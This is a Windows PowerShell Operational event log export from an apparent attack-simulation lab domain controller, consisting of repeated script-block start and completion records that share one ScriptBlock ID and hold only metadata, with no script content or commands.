TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471171
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471170
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471169
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471168
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471167
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471166
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471165
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471164
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471163
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471162
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471161
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471160
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471159
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471158
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471157
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471156
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471155
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471154
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471153
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471152
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471151
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471150
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471149
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471148
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471147
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471146
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471145
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471144
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471143
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471142
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471141
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471140
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471139
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471138
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471137
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471136
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471135
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471134
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471133
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471132
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471131
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471130
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471129
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471128
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471127
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471126
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471125
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471124
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471123
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471122
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471121
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471120
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471119
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471118
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471117
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
